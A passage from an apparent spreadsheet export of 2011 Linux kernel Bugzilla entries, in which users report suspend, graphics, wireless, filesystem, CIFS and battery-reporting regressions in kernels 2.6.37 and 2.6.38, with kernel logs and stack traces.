    <t>Created attachment 44962 [details] kernel configuration used Trying v2.6.38-rc1 I noticed the following behaviour with suspending (to ram, i.e. no hibernate) on Lenovo Thinkpad X201: - Entering suspend works fine. - After suspending, pressing the power button wakes up the computer (LEDs light up) - A second or so thereafter, it turns off completely. - A few more seconds later, computer turns itself on again and boots freshly. Bisecting lead me to commit 5bd5a452662bc37c54fb6828db1a3faf87e6511c (x86: Add NX protection for kernel data). The commit mentions extensions to the CONFIG_DEBUG_RODATA option. I had this option turned on until now; turning it off doesn't make the described suspend bug go away however. Also checked with v2.6.38-rc2, no change. I'll attach my .config. Please advise when I can help further.</t>
  </si>
  <si>
    <t>WARNING: at kernel/lockdep.c:2323 trace_hardirqs_on_caller</t>
  </si>
  <si>
    <t>2011-01-24 10:49 UTC</t>
  </si>
  <si>
    <t>2011-03-30 21:40 UTC</t>
  </si>
  <si>
    <t>2.6.38-rc2 gives me the following warning: [ 59.524272] ------------[ cut here ]------------ [ 59.524281] WARNING: at kernel/lockdep.c:2323 trace_hardirqs_on_caller+0x157/0x1f0() [ 59.524283] Hardware name: System Product Name [ 59.524285] Modules linked in: binfmt_misc kvm_intel kvm parport_pc ppdev snd_hda_codec_realtek snd_hda_intel snd_usb_audio snd_hda_codec snd_pcm_oss snd_hdsp snd_seq_dummy snd_mixer_oss arc4 snd_seq_oss snd_pcm snd_hwdep snd_usbmidi_lib rt61pci snd_seq_midi snd_seq_midi_event rt2x00pci rt2x00lib snd_rawmidi snd_seq snd_timer mac80211 snd_seq_device psmouse snd serio_raw cfg80211 eeprom_93cx6 soundcore snd_page_alloc i7core_edac asus_atk0110 edac_core coretemp lp parport usbhid hid firewire_ohci pata_jmicron firewire_core ahci libahci r8169 crc_itu_t mii btrfs zlib_deflate crc32c libcrc32c [ 59.524333] Pid: 2532, comm: nm-applet Not tainted 2.6.38-rc2+ #33 [ 59.524335] Call Trace: [ 59.524336] &lt;IRQ&gt; [&lt;ffffffff8106598f&gt;] ? warn_slowpath_common+0x7f/0xc0 [ 59.524344] [&lt;ffffffff815c3360&gt;] ? _raw_spin_unlock_irq+0x30/0x70 [ 59.524347] [&lt;ffffffff810659ea&gt;] ? warn_slowpath_null+0x1a/0x20 [ 59.524350] [&lt;ffffffff8109eda7&gt;] ? trace_hardirqs_on_caller+0x157/0x1f0 [ 59.524353] [&lt;ffffffff8109ee4d&gt;] ? trace_hardirqs_on+0xd/0x10 [ 59.524356] [&lt;ffffffff815c3360&gt;] ? _raw_spin_unlock_irq+0x30/0x70 [ 59.524360] [&lt;ffffffff813b85fe&gt;] ? rpm_suspend+0x21e/0x4a0 [ 59.524365] [&lt;ffffffff812eae84&gt;] ? do_raw_spin_lock+0x54/0x160 [ 59.524368] [&lt;ffffffff813b8a8b&gt;] ? rpm_idle+0x17b/0x1e0 [ 59.524371] [&lt;ffffffff813b8bcb&gt;] ? __pm_runtime_idle+0x5b/0x90 [ 59.524376] [&lt;ffffffff8142fd50&gt;] ? usb_autopm_put_interface_async+0x30/0x40 [ 59.524380] [&lt;ffffffffa00fa98e&gt;] ? hid_ctrl+0x17e/0x1c0 [usbhid] [ 59.524384] [&lt;ffffffff8142ac54&gt;] ? usb_hcd_giveback_urb+0x64/0xe0 [ 59.524388] [&lt;ffffffff8144acc6&gt;] ? uhci_giveback_urb+0xb6/0x240 [ 59.524391] [&lt;ffffffff8144b346&gt;] ? uhci_scan_schedule+0x486/0xac0 [ 59.524395] [&lt;ffffffff8144cc2b&gt;] ? uhci_irq+0x7b/0x150 [ 59.524397] [&lt;ffffffff8142a4d5&gt;] ? usb_hcd_irq+0x55/0xd0 [ 59.524401] [&lt;ffffffff810d3c24&gt;] ? handle_IRQ_event+0x64/0x1e0 [ 59.524405] [&lt;ffffffff810d649d&gt;] ? handle_fasteoi_irq+0x7d/0x100 [ 59.524409] [&lt;ffffffff8100ea22&gt;] ? handle_irq+0x22/0x40 [ 59.524412] [&lt;ffffffff815cab5d&gt;] ? do_IRQ+0x5d/0xe0 [ 59.524415] [&lt;ffffffff815c3a13&gt;] ? ret_from_intr+0x0/0x1a [ 59.524416] &lt;EOI&gt; [&lt;ffffffff8100bffa&gt;] ? sysret_check+0x2e/0x69 [ 59.524421] ---[ end trace ed0e2a86e79a3437 ]--- it seems to happen after booting, when logging into gnome.</t>
  </si>
  <si>
    <t>ata2.00: failed to set xfermode (err_mask=0x4) with PIONEER DVD-RW DVR-212D</t>
  </si>
  <si>
    <t>2.6.36 -&gt; actual</t>
  </si>
  <si>
    <t>2011-01-24 15:12 UTC</t>
  </si>
  <si>
    <t>punkeroso</t>
  </si>
  <si>
    <t>2012-05-12 15:32 UTC</t>
  </si>
  <si>
    <t>Reported problem is the exact same as: http://thread.gmane.org/gmane.linux.ide/36790 And there was a submitted patch that fixed the problem but it was limited to PIONEER DVD-RW DVRTD08 This same issue has popped up again log here https://bbs.archlinux.org/viewtopic.php?id=107847 So I made a simple patch to add this drive to the list that benefits from the patch mentioned in the first link, this solved the problem.</t>
  </si>
  <si>
    <t>ath9k prevents CPU from entering lower C-states</t>
  </si>
  <si>
    <t>2011-01-24 22:43 UTC</t>
  </si>
  <si>
    <t>2011-03-04 23:55 UTC</t>
  </si>
  <si>
    <t>In 2.6.37, when ath9k is active (interface up and connected to wireless), my CPU (Intel Core i5-520M) is not entering the lowest C-state anymore (according to powertop). This is caused by commit [1] and reported on the linux-wireless list at [2]. Reverting the commit fixes the problem and returns it to 2.6.36 behaviour. As a response to the mailing list post following [2]: I don't care about alleged throughput problems on some Pinetrail platform I do not have. Nor do I care that this may be "fixed" by making the QoS values configurable in 2.6.38. What I do care about is that this commit is keeping my CPU in a higher C state than necessary constantly, probably diminishing my battery life significantly. This is a serious regression for me. [1] http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=10598c124ecabbbfd7522f74de19b8f7d52a1bee [2] http://permalink.gmane.org/gmane.linux.kernel.wireless.general/63430</t>
  </si>
  <si>
    <t>2.6.37-git16</t>
  </si>
  <si>
    <t>2011-01-26 20:17 UTC</t>
  </si>
  <si>
    <t>2011-01-29 11:59 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.37-git16 -- INFO: HARDIRQ-safe -&gt; HARDIRQ-unsafe lock order detected Submitter : Miles Lane &lt;miles.lane@gmail.com&gt; Date : 2011-01-17 21:29 Message-ID : AANLkTik2r1P9dqyw+QoHg9G3PUvvPukY08TpS5Ud1ffG@mail.gmail.com References : http://marc.info/?l=linux-kernel&amp;m=129529978925170&amp;w=2 This entry is being used for tracking a regression from 2.6.37. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>38-rc1: umount+rmmod cause ext4 error.</t>
  </si>
  <si>
    <t>2011-01-26 20:26 UTC</t>
  </si>
  <si>
    <t>2011-02-12 22:38 UTC</t>
  </si>
  <si>
    <t>Subject : 38-rc1: umount+rmmod cause ext4 error. Submitter : Tao Ma &lt;tm@tao.ma&gt; Date : 2011-01-19 6:53 Message-ID : 4D368A70.5030103@tao.ma References : http://marc.info/?l=linux-ext4&amp;m=129542001031750&amp;w=2 This entry is being used for tracking a regression from 2.6.37. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>regression 2.6.37 -&gt; 2.6.38-rc1: after suspend backlight cannot be adjusted</t>
  </si>
  <si>
    <t>2011-01-27 19:57 UTC</t>
  </si>
  <si>
    <t>2011-04-26 02:24 UTC</t>
  </si>
  <si>
    <t>26832 27812 28072 28942</t>
  </si>
  <si>
    <t>Subject : regression 2.6.37 -&gt; 2.6.38-rc1: after suspend backlight cannot be adjusted Submitter : Norbert Preining &lt;preining@logic.at&gt; Date : 2011-01-21 1:55 Message-ID : 20110121015529.GD9796@gamma.logic.tuwien.ac.at References : http://marc.info/?l=linux-kernel&amp;m=129557717826819&amp;w=2 This entry is being used for tracking a regression from 2.6.37. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>SNB/ILK: VT-switch causes lock-up</t>
  </si>
  <si>
    <t>2011-01-28 10:55 UTC</t>
  </si>
  <si>
    <t>2011-02-19 23:45 UTC</t>
  </si>
  <si>
    <t>After plugging/unplugging the external VGA monitor, changing between VT1 and VT7 repeatedly triggers a lock-up on SandyBridge and IronLake machines. The procedure is: - Start X (not necessarily GNOME; twm or bare X also suffers) - Plug a VGA monitor - run "xrandr --auto" - Switch to VT1, back to VT7 - Unplug the VGA - run "xrandr --auto" - Switch to VT1, back to VT7 - Repeat to switch to VT1/V7; at once or second repeat, the machine locks up. Tested on two SandyBridge laptops and one IronLake laptop. This happens with the vanilla 2.6.37 kernel. And, it doesn't happen with 2.6.36 kernel. So, it's yet-another-2.6.37 regression. I quickly tested 2.6.38-rc2+ as of commit 6fb1b30, but the problem still exists.</t>
  </si>
  <si>
    <t>DRM BUG - X fails to start with 2.6.38-rc2+</t>
  </si>
  <si>
    <t>2.6.38-rc2+</t>
  </si>
  <si>
    <t>2011-01-29 13:21 UTC</t>
  </si>
  <si>
    <t>2011-01-29 21:44 UTC</t>
  </si>
  <si>
    <t>Subject : DRM BUG - X fails to start with 2.6.38-rc2+ Submitter : Chris Clayton &lt;chris2553@googlemail.com&gt; Date : 2011-01-22 9:35 Message-ID : 201101220935.03623.chris2553@googlemail.com References : http://marc.info/?l=linux-kernel&amp;m=129568892911047&amp;w=2 This entry is being used for tracking a regression from 2.6.37. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Cannot launch X.org server on Core I5 with 2.6.38-rc2-git7</t>
  </si>
  <si>
    <t>2011-01-30 12:13 UTC</t>
  </si>
  <si>
    <t>Darisuz Luksza</t>
  </si>
  <si>
    <t>2011-02-12 22:40 UTC</t>
  </si>
  <si>
    <t>Created attachment 45542 [details] kernel configuration file On my Toshiba Portege r700 with i5 processor and integrated intel graphic card and kernel 2.6.28-rc2-git7 when I want to start x from command line it ends with a blank screen, I cannot switch back on text console or do anything wit it. I can only hard reset by holding power button. Here is part from my kernel.log: [ 30.455807] phyerr 0x20, rate 0xa [ 30.455813] Raw TxDesc + plcp header: [ 30.455824] 0000: 09 00 00 00 b0 00 00 00 00 00 02 00 02 00 00 00 [ 30.455835] 0016: 00 00 0a 00 00 07 00 00 00 00 00 00 00 00 00 00 [ 30.455847] 0032: 00 00 00 00 00 00 94 0c 6d ee 69 4a 00 00 00 00 [ 30.455859] 0048: 00 00 00 00 00 00 0a 04 10 01 22 00 3a 01 00 00 [ 30.455871] 0064: 00 00 00 00 00 00 00 00 00 00 00 00 03 1a 00 00 [ 30.455883] 0080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [ 30.455895] 0096: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [ 30.455908] 0112: 0a 04 10 01 00 00 b0 00 3a 01 94 0c 6d ee 69 4a [ 30.455921] 0128: 4c ed de 1c 53 ed 94 0c 6d ee 69 4a d0 00 00 00 [ 30.455933] 0144: 01 00 00 00 01 88 ff ff 00 00 00 00 00 00 00 00 [ 30.455939] TxCtlLow: 0009 TxCtlHigh: 0000 FC: 00b0 FES Time: 0000 [ 30.455950] PhyCtl: 0000 PhyCtl_1: 0002 PhyCtl_1_Fbr: 0002 [ 30.455959] PhyCtl_1_Rts: 0000 PhyCtl_1_Fbr_Rts: 0000 [ 30.455966] MainRates: 000a XtraFrameTypes: 0700 [ 30.455980] SecIV: 00000000000000000000000000000000 [ 30.455987] RA: 940C6DEE694A [ 30.455992] Fb FES Time: 0000 RTS PLCP: 000000000000 RTS DUR: 0000 PLCP: 0A0410012200 DUR: 013a [ 30.456011] MModeLen: 0000 MModeFbrLen: 0000 [ 30.456018] FrameID: 1a03 [ 30.456022] TxStatus: 0000 [ 30.456026] MaxNumMpdu: 0000 [ 30.456031] MaxAggbyte: 0000 [ 30.456035] MaxAggbyte_fb: 0000 [ 30.456039] MinByte: 0000 [ 30.456045] RTS PLCP: 000000000000 RTS Frame: 00000000000000000000000000000000 [ 30.456060] [ 30.456061] txpkt (MPDU) Complete [ 30.456066] FrameID: 1a03 TxStatus: 0019 [ 30.456074] [15:12] 0 frame attempts [ 30.456079] [11:8] 0 rts attempts [ 30.456083] [7] 0 PM mode indicated [ 30.456088] [6] 0 intermediate status [ 30.456092] [5] 0 AMPDU [ 30.456098] [4:2] 6 Frame Suppressed Reason (Underflow) [ 30.456103] [1] 0 acked [ 30.456107] LastTxTime: 0000 Seq: 0000 PHYTxStatus: 0020 RxAckRSSI: 0000 RxAckSQ: 0000 X.org server version: 1.9.3.901-r1 xf86-video-intel version: 2.14.0 lspci -v -s 00:02.0 00:02.0 VGA compatible controller: Intel Corporation Core Processor Integrated Graphics Controller (rev 02) (prog-if 00 [VGA controller]) Subsystem: Toshiba America Info Systems Device 0007 Flags: bus master, fast devsel, latency 0, IRQ 40 Memory at d0000000 (64-bit, non-prefetchable) [size=4M] Memory at c0000000 (64-bit, prefetchable) [size=256M] I/O ports at 3050 [size=8] Expansion ROM at &lt;unassigned&gt; [disabled] Capabilities: [90] MSI: Enable+ Count=1/1 Maskable- 64bit- Capabilities: [d0] Power Management version 2 Capabilities: [a4] PCI Advanced Features Kernel driver in use: i915</t>
  </si>
  <si>
    <t>[2.6.38-0.rc2.git7.1.fc15] Kernel oops opening possible HFS disk image</t>
  </si>
  <si>
    <t>2.6.38-rc2-git7</t>
  </si>
  <si>
    <t>2011-01-31 23:31 UTC</t>
  </si>
  <si>
    <t>2011-02-12 22:42 UTC</t>
  </si>
  <si>
    <t>Created attachment 45672 [details] oops Attempted to mount this image: http://pcdn2-download.vzw.com/mac/7.2/VZAM_7.2.4_2534b_UML290.dmg using the following command, resulting in a kernel oops: sudo mount -t hfsplus -o loop VZAM_7.2.4_2534b_UML290.dmg /tmp/mac290/ [ 655.841507] Pid: 2478, comm: mount Not tainted 2.6.38-0.rc2.git7.1.fc15.x86_64 #1 30E1/HP EliteBook 2530p [ 655.841507] RIP: 0010:[&lt;ffffffffa047723d&gt;] [&lt;ffffffffa047723d&gt;] hfsplus_sync_fs+0x3a/0x174 [hfsplus] [ 655.841507] RSP: 0018:ffff880108c15a48 EFLAGS: 00010202 [ 655.841507] RAX: 0000000000000000 RBX: ffff880131bb6400 RCX: 000000000000200b [ 655.841507] RDX: 00000000ffffffea RSI: 0000000000000001 RDI: ffff880114989c00 [ 655.841507] RBP: ffff880108c15a88 R08: 0000000000000002 R09: 0000000000000005 [ 655.841507] R10: 0000000000000005 R11: 0000000000000000 R12: 0000000000000000 [ 655.841507] R13: ffff880114989c00 R14: ffff880119854800 R15: ffff880131bb6478 [ 655.841507] FS: 00007fe1c2055820(0000) GS:ffff8800b4c00000(0000) knlGS:0000000000000000 [ 655.841507] CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b [ 655.841507] CR2: 0000000000000008 CR3: 0000000108d80000 CR4: 00000000000406f0 [ 655.841507] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 [ 655.841507] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 [ 655.841507] Process mount (pid: 2478, threadinfo ffff880108c14000, task ffff880133788000) [ 655.841507] Stack: [ 655.841507] ffffffffa042f0d0 ffff880131bb64a8 ffff880108c15ab8 ffff880131bb6400 [ 655.841507] ffff880114989c00 ffff880119854800 ffffffffa042f0d0 ffff880131bb64a8 [ 655.841507] ffff880108c15ab8 ffffffffa04773d7 0000000000000005 ffff880131bb6400 [ 655.841507] Call Trace: [ 655.841507] [&lt;ffffffffa04773d7&gt;] hfsplus_put_super+0x60/0xc0 [hfsplus] [ 655.841507] [&lt;ffffffffa0477b6f&gt;] hfsplus_fill_super+0x475/0x4ae [hfsplus] [ 655.841507] [&lt;ffffffff8112ac0e&gt;] ? do_lookup+0x11a/0x1f1 [ 655.841507] [&lt;ffffffff81229fda&gt;] ? kobject_get+0x17/0x1e [ 655.841507] [&lt;ffffffff8121b910&gt;] ? get_disk+0x75/0x95 [ 655.841507] [&lt;ffffffff8146eed4&gt;] ? _cond_resched+0xe/0x22 [ 655.841507] [&lt;ffffffff812e4ab4&gt;] ? kobj_lookup+0x141/0x179 [ 655.841507] [&lt;ffffffff810ef4fb&gt;] ? pcpu_chunk_relocate+0x17/0x71 [ 655.841507] [&lt;ffffffff810ef9a7&gt;] ? pcpu_alloc_area+0x207/0x24a [ 655.841507] [&lt;ffffffff8122fa3a&gt;] ? string.isra.6+0x3d/0xa2 [ 655.841507] [&lt;ffffffff81230771&gt;] ? vsnprintf+0x1d1/0x42c [ 655.841507] [&lt;ffffffff81230a58&gt;] ? snprintf+0x34/0x36 [ 655.841507] [&lt;ffffffff811227b5&gt;] ? set_bdev_super+0x0/0x34 [ 655.841507] [&lt;ffffffff8114a041&gt;] ? set_blocksize+0x3a/0xb2 [ 655.841507] [&lt;ffffffff81123769&gt;] mount_bdev+0x14c/0x1ae [ 655.841507] [&lt;ffffffffa04776fa&gt;] ? hfsplus_fill_super+0x0/0x4ae [hfsplus] [ 655.841507] [&lt;ffffffffa04770a0&gt;] hfsplus_mount+0x15/0x17 [hfsplus] [ 655.841507] [&lt;ffffffff81122fdb&gt;] vfs_kern_mount+0xaa/0x1d4 [ 655.841507] [&lt;ffffffff8112316d&gt;] do_kern_mount+0x4d/0xdf [ 655.841507] [&lt;ffffffff81139766&gt;] do_mount+0x6c6/0x71a [ 655.841507] [&lt;ffffffff810ec220&gt;] ? strndup_user+0x3b/0x51 [ 655.841507] [&lt;ffffffff81139a4a&gt;] sys_mount+0x88/0xc2 [ 655.841507] [&lt;ffffffff81009bc2&gt;] system_call_fastpath+0x16/0x1b [ 655.841507] Code: ec 18 0f 1f 44 00 00 48 8b 9f 78 02 00 00 45 31 e4 85 f6 49 89 fd 4c 8b 33 0f 84 34 01 00 00 c6 47 14 00 48 8b 43 18 4c 8d 7b 78 &lt;48&gt; 8b 40 08 48 8b b8 40 01 00 00 e8 ef 25 c6 e0 41 89 c4 48 8b [ 655.841507] RIP [&lt;ffffffffa047723d&gt;] hfsplus_sync_fs+0x3a/0x174 [hfsplus] [ 655.841507] RSP &lt;ffff880108c15a48&gt; [ 655.841507] CR2: 0000000000000008 [ 655.880364] ---[ end trace b7f9f6ae912bbe10 ]---</t>
  </si>
  <si>
    <t>[drm:i915_driver_load] *ERROR* failed to init modeset, EINVAL</t>
  </si>
  <si>
    <t>2.6.38-rc3</t>
  </si>
  <si>
    <t>2011-02-01 15:18 UTC</t>
  </si>
  <si>
    <t>2011-02-12 22:43 UTC</t>
  </si>
  <si>
    <t>Created attachment 45792 [details] dmesg after modprobe i915 modeset=1 (with no modules loaded beforehand) Under 2.6.37, modprobe i915 modeset=1 switched to 128x48 all right. Under 2.6.38-rc3, it garbles the screen: there's an irregularly blinking narrow rectangle spanning the full height of the screen in the column of the cursor. The machine otherwise works. The wastly overheight cursor advances on each keypress but no single letter is visible on the screen, apart from some faint broken lines flying away during heavy scrolling. Full dmesg attached, but it ends with: [ 13.585039] i915 0000:00:02.1: BAR 6: can't assign [??? 0x00000000 flags 0x0] (bogus alignment) [ 13.585168] [drm] failed to find VBIOS tables [ 13.597709] [drm] initialized overlay support [ 13.597779] vga_switcheroo: disabled [ 13.597898] [drm:i915_driver_load] *ERROR* failed to init modeset [ 13.598562] i915: probe of 0000:00:02.1 failed with error -22</t>
  </si>
  <si>
    <t>[BUG] 2.6.38-rc2: Circular Locking Dependency</t>
  </si>
  <si>
    <t>2011-02-01 20:58 UTC</t>
  </si>
  <si>
    <t>2011-02-13 23:42 UTC</t>
  </si>
  <si>
    <t>Subject : [BUG] 2.6.38-rc2: Circular Locking Dependency Submitter : Knut Petersen &lt;Knut_Petersen@t-online.de&gt; Date : 2011-01-24 9:25 Message-ID : 4D3D45A3.7040809@t-online.de References : http://marc.info/?l=linux-kernel&amp;m=129586118515443&amp;w=2 This entry is being used for tracking a regression from 2.6.37. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Suspend does not work anymore</t>
  </si>
  <si>
    <t>2.6.32-25+</t>
  </si>
  <si>
    <t>2011-02-03 17:20 UTC</t>
  </si>
  <si>
    <t>remi</t>
  </si>
  <si>
    <t>2011-07-09 09:47 UTC</t>
  </si>
  <si>
    <t>Hello, Starting from linux kernel version 2.6.32-25, I cannot put my laptop in sleep mode. In version 2.6.32-24, it worked. I am using Ubuntu 10.04 LTS, here are my system details: ~$ sudo lshw description: Notebook product: A6JC vendor: ASUSTeK Computer Inc. version: 1.0 Could you please fix this bug ? Thanks ! Rémi</t>
  </si>
  <si>
    <t>CIFS: "Echo Request" message results in STATUS_ACCESS_DENIED</t>
  </si>
  <si>
    <t>2011-02-03 18:54 UTC</t>
  </si>
  <si>
    <t>JG</t>
  </si>
  <si>
    <t>2011-02-12 22:45 UTC</t>
  </si>
  <si>
    <t>hi, after mounting a CIFS share on a windows server 2003, r2 3790 SP2, and doing "nothing"/idling, after about 50-60 seconds accessing the mounted share is not possible anymore due to "permission denied" errors. sniffing the traffic reveals that a "Echo Request" message is being sent immediately followed by a "Echo Response, Error: STATUS_ACCESS_DENIED" message. after that one has to remount the share in order to access it again. accessing the share and copying files seems to work fine immediately after mounting, but only until the "Echo Request" message. 2.6.37 was not affected. i've tested 2.6.38-rc2 and 2.6.38-rc3 and both suffer from the issues. mount.cifs version: 1.14-3.5.6, samba-3.5.6 ------------ CONFIG_CIFS=y # CONFIG_CIFS_STATS is not set CONFIG_CIFS_WEAK_PW_HASH=y CONFIG_CIFS_UPCALL=y CONFIG_CIFS_XATTR=y CONFIG_CIFS_POSIX=y # CONFIG_CIFS_DEBUG2 is not set CONFIG_CIFS_DFS_UPCALL=y CONFIG_CIFS_ACL=y CONFIG_CIFS_EXPERIMENTAL=y CONFIG_SMB_FS=m (module is not loaded) CONFIG_SMB_NLS_DEFAULT=y CONFIG_SMB_NLS_REMOTE="cp850" ------------- cat /proc/fs/cifs/DebugData Display Internal CIFS Data Structures for Debugging --------------------------------------------------- CIFS Version 1.69 Features: dfs lanman posix spnego xattr acl Active VFS Requests: 0 Servers: 1) Name: xxxx Domain: xxxx Uses: 1 OS: Windows Server 2003 R2 3790 Service Pack 2 NOS: Windows Server 2003 R2 5.2 Capability: 0x1f3fd SMB session status: 1 TCP status: 1 Local Users To Server: 1 SecMode: 0xf Req On Wire: 0 Shares: 1) xxxx Mounts: 1 Type: NTFS DevInfo: 0x20 Attributes: 0x700ff PathComponentMax: 255 Status: 0x1 type: DISK i've now compiled the debug settings too if that helps, but not yet rebooted (and only remote access at the moment). JG</t>
  </si>
  <si>
    <t>Spelling mistake</t>
  </si>
  <si>
    <t>HEAD</t>
  </si>
  <si>
    <t>2011-02-04 13:10 UTC</t>
  </si>
  <si>
    <t>Debayan Banerjee</t>
  </si>
  <si>
    <t>2012-05-12 15:25 UTC</t>
  </si>
  <si>
    <t>nouman khalid</t>
  </si>
  <si>
    <t>See line number 2329 of ftp://www.kernel.org/pub/scm/linux/kernel/git/jejb/storage-tree/drivers/staging/rtl8192e/ieee80211/ieee80211_softmac.c . It says 'respose instead of 'response'.</t>
  </si>
  <si>
    <t>Radeon Cedar 5450 doesn't interlace</t>
  </si>
  <si>
    <t>2011-02-04 16:59 UTC</t>
  </si>
  <si>
    <t>Chris Kennedy</t>
  </si>
  <si>
    <t>2011-02-20 00:09 UTC</t>
  </si>
  <si>
    <t>When using the 5450 card and trying a 640x480 interlaced console frame buffer I get half the screen shown (top half) and bottom is out of the screen display. It's a progressive picture too, not interlaced. If I use 320x240 progressive it all fits, so seems to be that the interlacing isn't working for this chip. Not sure if it's known and just not been implemented yet or if it's a bug. Thanks, Chris 40:00.0 VGA compatible controller: ATI Technologies Inc Device 68f9 (prog-if 00 [VGA controller]) Subsystem: PC Partner Limited Device e157 Flags: bus master, fast devsel, latency 0, IRQ 88 Memory at d0000000 (64-bit, prefetchable) [size=256M] Memory at f2500000 (64-bit, non-prefetchable) [size=128K] I/O ports at 3000 [size=256] [virtual] Expansion ROM at f2540000 [disabled] [size=128K] Capabilities: [50] Power Management version 3 Capabilities: [58] Express Legacy Endpoint, MSI 00 Capabilities: [a0] MSI: Enable+ Count=1/1 Maskable- 64bit+ Capabilities: [100] Vendor Specific Information &lt;?&gt; Capabilities: [150] Advanced Error Reporting Kernel driver in use: radeon 40:00.1 Audio device: ATI Technologies Inc Device aa68 Subsystem: PC Partner Limited Device aa68 Physical Slot: 2 Flags: bus master, fast devsel, latency 0, IRQ 5 Memory at f2520000 (64-bit, non-prefetchable) [size=16K] Capabilities: [50] Power Management version 3 Capabilities: [58] Express Legacy Endpoint, MSI 00 Capabilities: [a0] MSI: Enable- Count=1/1 Maskable- 64bit+ Capabilities: [100] Vendor Specific Information &lt;?&gt; Capabilities: [150] Advanced Error Reporting Kernel modules: snd-hda-intel [ 0.801038] [drm] Initialized drm 1.1.0 20060810 [ 0.801109] [drm] radeon defaulting to kernel modesetting. [ 0.801154] [drm] radeon kernel modesetting enabled. [ 0.801253] radeon 0000:40:00.0: PCI INT A -&gt; GSI 16 (level, low) -&gt; IRQ 16 [ 0.801304] radeon 0000:40:00.0: setting latency timer to 64 [ 0.804194] [drm] initializing kernel modesetting (CEDAR 0x1002:0x68F9). [ 0.804282] [drm] register mmio base: 0xF2500000 [ 0.804327] [drm] register mmio size: 131072 [ 0.804566] ATOM BIOS: CEDAR [ 0.804700] radeon 0000:40:00.0: VRAM: 512M 0x0000000000000000 - 0x000000001FFFFFFF (512M used) [ 0.804755] radeon 0000:40:00.0: GTT: 512M 0x0000000020000000 - 0x000000003FFFFFFF [ 0.805277] [drm] Detected VRAM RAM=512M, BAR=256M [ 0.805329] [drm] RAM width 64bits DDR [ 0.805461] [TTM] Zone kernel: Available graphics memory: 1541250 kiB. [ 0.805508] [TTM] Initializing pool allocator. [ 0.805576] [drm] radeon: 512M of VRAM memory ready [ 0.805621] [drm] radeon: 512M of GTT memory ready. [ 0.805686] [drm] Supports vblank timestamp caching Rev 1 (10.10.2010). [ 0.805732] [drm] Driver supports precise vblank timestamp query. [ 0.805830] radeon 0000:40:00.0: irq 88 for MSI/MSI-X [ 0.805837] radeon 0000:40:00.0: radeon: using MSI. [ 0.805917] [drm] radeon: irq initialized. [ 0.805963] [drm] GART: num cpu pages 131072, num gpu pages 131072 [ 0.807259] [drm] Loading CEDAR Microcode [ 0.809692] radeon 0000:40:00.0: WB enabled [ 0.826164] [drm] ring test succeeded in 1 usecs [ 0.826364] [drm] radeon: ib pool ready. [ 0.826569] [drm] ib test succeeded in 0 usecs [ 0.827043] [drm] Radeon Display Connectors [ 0.827087] [drm] Connector 0: [ 0.827129] [drm] HDMI-A [ 0.827171] [drm] HPD1 [ 0.827214] [drm] DDC: 0x6460 0x6460 0x6464 0x6464 0x6468 0x6468 0x646c 0x646c [ 0.827265] [drm] Encoders: [ 0.827307] [drm] DFP1: INTERNAL_UNIPHY1 [ 0.827350] [drm] Connector 1: [ 0.827392] [drm] DVI-I [ 0.827434] [drm] HPD4 [ 0.827476] [drm] DDC: 0x6440 0x6440 0x6444 0x6444 0x6448 0x6448 0x644c 0x644c [ 0.827527] [drm] Encoders: [ 0.827569] [drm] DFP2: INTERNAL_UNIPHY [ 0.827612] [drm] CRT1: INTERNAL_KLDSCP_DAC1 [ 0.827655] [drm] Connector 2: [ 0.827697] [drm] VGA [ 0.827739] [drm] DDC: 0x6430 0x6430 0x6434 0x6434 0x6438 0x6438 0x643c 0x643c [ 0.827790] [drm] Encoders: [ 0.827832] [drm] CRT2: INTERNAL_KLDSCP_DAC2 [ 0.934929] [drm] Internal thermal controller with fan control [ 0.935028] [drm] radeon: power management initialized [ 1.066145] [drm] fb mappable at 0xD0141000 [ 1.066189] [drm] vram apper at 0xD0000000 [ 1.066233] [drm] size 9216000 [ 1.066275] [drm] fb depth is 24 [ 1.066317] [drm] pitch is 7680 [ 1.500225] [drm] force priority to high [ 1.500231] [drm] force priority to high [ 1.514974] Console: switching to colour frame buffer device 240x67 [ 1.520982] fb0: radeondrmfb frame buffer device [ 1.520985] drm: registered panic notifier [ 1.521048] [drm] Initialized radeon 2.8.0 20080528 for 0000:40:00.0 on minor 0</t>
  </si>
  <si>
    <t>battery confuses mW and mA reporting units =&gt; wrong rate/energy</t>
  </si>
  <si>
    <t>v2.6.38</t>
  </si>
  <si>
    <t>2011-02-04 18:49 UTC</t>
  </si>
  <si>
    <t>2011-08-30 01:14 UTC</t>
  </si>
  <si>
    <t>On Thinkpad X201, often either of these erroneous power supply data (from /sys/class/power_supply/BAT0) are visible in user space apps: - energy and rate too low by factor of ~10 - energy and rate too high by factor of ~10 This happens mostly after resuming from hibernate or after fresh boot. I've compiled battery as module -- reloading the module corrects the data most of the time. Using ACPI tracing, I checked the data returned by _BIF and _BST (it always checks out with the corresponding raw sysfs values). My suspicion as to what is happening: - _BIF, which among others returns the reporting unit of the battery data, is only called once at module load. Depending on the unit, either sysfs file current_now or power_now is set up -- after that, always containing the number in the second field of the package returned by _BST. - Thinkpad X201 sometimes changes its mind which unit the data is in it reports to the periodically called _BST. - But the module doesn't detect that and so there are two possibilities of miscalculations (data set used see at bottom): 1. unit mW at module load, changed to mA: - power_now is present, but its value is a current, e.g. 1312000 (= 1.312 A) - so power is 1.312 "W", instead of voltage_now*current_now = 14.6 W 2. unit mA at module load, changed to mW: - current_now is present, but its value is a power, e.g. 14740000 (= 14.74 W) - so power is calculated as voltage_now*current now, yielding 163.7 "W" in user space apps (like gnome-power-manager) - reloading the module calls _BIF and _BST in short succession and the data units and values fit again. The approximate factor 10 can be identified as voltage_now, which is about 11 V. Data set used as example follows. Here, _BIF must have reported mW initially, but _BST reports mA numbers. After reloading the module, the X201 changes its mind and reports mW again. - fresh boot: $ cat energy_now 